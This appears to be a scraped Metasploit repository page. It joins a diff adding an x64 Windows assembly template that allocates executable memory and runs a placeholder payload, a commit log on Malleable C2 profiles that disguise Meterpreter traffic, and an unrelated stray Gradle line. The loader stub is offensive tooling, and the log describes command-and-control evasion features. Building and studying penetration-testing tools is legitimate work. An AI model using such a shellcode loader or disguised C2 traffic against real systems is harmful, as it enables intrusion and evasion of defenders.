+; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main 
+
+extrn ExitProcess : proc
+extrn VirtualAlloc : proc
+
+.code
+
+	main proc 
+		sub rsp, 40        ;
+		mov r9, 40h        ; 
+		mov r8, 3000h      ; 
+		mov rdx, 4096      ; 
+		xor rcx, rcx       ; 
+		call VirtualAlloc  ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
+		mov rcx, 4096      ;
+		mov rsi, payload   ;
+		mov rdi, rax       ;
+		rep movsb          ; memcpy( lpPayload, payload, 4096 );
+		call rax           ; lpPayload();
+		xor rcx, rcx       ;
+		call ExitProcess   ; ExitProcess( 0 );
+	main endp
+	
+	payload proc
+		A byte 'PAYLOAD:'
+		B db 4096-8 dup ( 0 )
+	payload endp
+end
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Diego Ledda	ca7ba0a20d	Merge pull request #20419 from OJ/feature/malleable-c2 Initial support for Malleable C2 Profiles in HTTP Meterpreter	2026-04-01 08:46:50 -04:00
Diego Ledda	166ee2a23d	Change MALLEABLEC2 option type to OptPath	2026-03-27 14:44:46 +01:00
Diego Ledda	a14b98f7a6	Change MALLEABLEC2 option type to OptPath	2026-03-27 14:43:49 +01:00
OJ Reeves	8df4ff7748	Fix stale C2 profile configuration	2026-03-22 14:20:59 +10:00
OJ Reeves	fe77ec9e24	Extract GET/POST TLV builders Tidies up the to_tlv method into more manageable chunks.	2026-03-22 13:48:26 +10:00
OJ Reeves	2f7ed8a5a9	Fix base_uri mutation The << operator would mutate the base_uri, corrupting the profile's stored URI value in cases where add_uri is called more than once. Which it likely would be! This dupes the value instead of referencing it. I hate ruby.	2026-03-22 09:50:18 +10:00
OJ Reeves	2e64231c93	Short-circuit on first match of directives Faster impl of has_directive	2026-03-22 09:46:55 +10:00
OJ Reeves	2a6ebeae47	Simplify prefix/suffix checks Clearer checks against suffix/prefixes while also avoiding the edge-case where suffix.length could be zero, resulting in raw_bytes[-0, length] behaving unexpectedly.	2026-03-22 09:44:54 +10:00
OJ Reeves	e2614898e6	Fix hex escape parasing in C2 profile string handling The \x sequence only uses 2 hex digits, but the slice was taking 4 by mistake. It should have been 2 instead.	2026-03-22 09:42:26 +10:00
OJ Reeves	5a28827de4	Fix bug unwrapping bytes in post	2026-03-22 09:35:52 +10:00
OJ Reeves	f7b97ba441	Add C2 profile support to win https	2026-03-21 15:22:17 +10:00
Spencer McIntyre	dfd2160eef	Ensure slashes are where they need to be	2025-10-01 09:52:09 -04:00
Spencer McIntyre	56d6498b41	Switch PROXY_HOST to PROXY_URL which is more accurate Still not fully accurate though since socks seems to be prefixed with socks= and not socks://	2025-09-26 17:28:31 -04:00
Spencer McIntyre	7fc34485cd	Handle IPv6 addresses in the URL	2025-09-26 15:30:55 -04:00
Spencer McIntyre	b2eb7f52cc	Fix old payloads	2025-09-23 13:26:06 -04:00
OJ Reeves	8c4f7fa7ad	Support escaped double-quote	2025-07-30 18:11:17 +10:00
OJ Reeves	2c4eaff583	Support encoding/decoding of data from C2 profile	2025-07-30 15:02:08 +10:00
OJ Reeves	ba5e097b6f	Revert previous change to cid extraction	2025-07-30 13:04:22 +10:00
OJ Reeves	f93d308b6c	Add C2 custom header support in responses	2025-07-29 13:28:20 +10:00
OJ Reeves	1abbb7071f	Fixes as per discussion	2025-07-29 12:32:18 +10:00
OJ Reeves	f82fe8ee0d	Prepends should not be reversed	2025-07-28 14:25:06 +10:00
OJ Reeves	6496e7f012	Re-add the overridden body property in the HTTP packet I hate this craziness, but I have no idea what I'll break if I don't leave this in.	2025-07-28 10:59:42 +10:00
OJ Reeves	bbdf45a948	Fix transport comment TLV generation/handling	2025-07-28 10:59:28 +10:00
OJ Reeves	fa5881eb18	Fix C2 config timeout generation	2025-07-28 10:58:26 +10:00
OJ Reeves	76954a63e9	Push CID finding into reverse_http Logic for finding connection UUIDs has been pushed into reverse_http so that it's not part of the Http::Server any more. It's a little bit of a leaky abstraction, but at least the logic is in the one place now. Support added and tweaked for including the UUID in an HTTP header or in a GET param. Currently don't have support for it in the BODY as as param, not sure if that's a requirement yet or not. Same goes for cookies.	2025-07-24 15:21:56 +10:00
OJ Reeves	5def53e34c	Change support for connection IDs in the HTTP server NOTE: This change does remove the trailing "/" from URIs registered.. which implies that things might not match. So more to do here. Connection IDs are stored in the request now, so that they can be referenced by clients if and when required. IDs are pulled from various locations in the request.	2025-07-24 11:22:25 +10:00
OJ Reeves	c571e7dc1b	Remove query string from POST request body The `Http::Request` class had an overload for the `body` accessor that returned the query string parameters in the case that the body was empty. This is not only logically bizzarre, but functionally insane. The query string is not part of the body. If you want the query string, go get it. An interesting side effect of this craziness, along with the way the body is constructed, is that if you send a POST request to the server with a body AND a query string, MSF is kind enough to give you both together. Crazy right? Well, this is because the class uses the `body` accessor as an internal buffer, but that getter is overloaded. So if the `body` is blank, and the `+=` operator is used (which, it is!) then you end up with the query string being prepended to any actual body content. Insane. Also, from an API point of view, it looks just as crazy. Observe: ``` >> r = Rex::Proto::Http::Request::Post.new('/foo?lol=wtf') => ... >> r.body = '' => "" >> r.body => "lol=wtf" ``` No. This is a complete violation of logic. This commit removes this "feature" and not only fixes the bugs that I was fighting against, but restores some semblance of reason.	2025-07-24 10:59:45 +10:00
OJ Reeves	d589da9531	C2 profile persistence and better UUID handling Interim commit, contains code persists a C2 profile instance for reuse rather than having many being parsed all the time. Also begins work handling UUIDs outside of the URI.	2025-07-23 14:05:04 +10:00
OJ Reeves	42b027d829	Small fix for non-c2 profile payloads	2025-07-17 12:13:50 +10:00
OJ Reeves	71d943d835	Small code tidy	2025-07-17 11:37:19 +10:00
OJ Reeves	300d16e7cb	Wire in support for C2 profiles in the x64 payload	2025-07-16 14:29:29 +10:00
OJ Reeves	2d7f8b48a1	Tidy and refactor of some C2 code Includes removal of the referrer and accept types specific TLV values, because they can be treated like any other header, despite what the MSDN documentation says about the HTTP APIs. Moved packet wrapping to somewhere reusable. Added support for binary-escaped strings in C2 profile values (eg. "\x00").	2025-07-16 14:27:58 +10:00
OJ Reeves	f2d3120772	Add C2 packet support to the stageless transition Stageless payloads start with an :init_connect which needs special consideration given that it's just redirected. There's no client instance at that point, so there's no C2 associated with it, so we have to just manually wrap the outbound packet so that things work correctly.	2025-07-16 14:25:55 +10:00
OJ Reeves	fe7705dea8	Payload wrapping support and more * Supporting "wrapping" and "unwrapping" of payloads based on the C2 profile, which means that suffixes and prefixes are used based on what the configuration indicates. * Made sure taht the debug_build flag is passed through on HTTP/S payloads. * push details of the C2 profile into the meterp client so that required details can be easily accessed.	2025-07-15 11:57:37 +10:00
OJ Reeves	3ccd8e5b14	"Working" C2 sessions with diff GET/POST uris Still don't have all the fields implemented, but this at least supports the notion of having different URIs for GET and POST. The approach taken, to reduce the impact on how much code has to be changed, is to extract the UUID for the connection and use that as a resource identifier. This UUID doesn't have any slashes in it, and hence will not collide with any URI. This means we can use the UUID as a key in the same hash as the resource URIs knowing that a direct lookup will find the right session, even if by some miracle the UUID collides with a chosen/generated URI. Any URI in the resource list will be prefixed with a forward slash. The listener will listen on all URIs that exist for the Meterp configuration, including LURI setting, and the `uri` values in all three areas that it might be specified in the C2 profile.	2025-07-10 10:46:27 +10:00
OJ Reeves	5025992eaf	First pass of TLV-based configuration and MC2 Munged a few commits into this one. But we have basic support for TLV-based configuration blocks instead of hard-coded block sizes. Initial support for the MC2 stuff is in as well, but more to come.	2025-07-07 13:27:03 +10:00
				`@@ -1 +0,0 @@`
				`rootProject.name = 'MetasploitPayloadExtension'`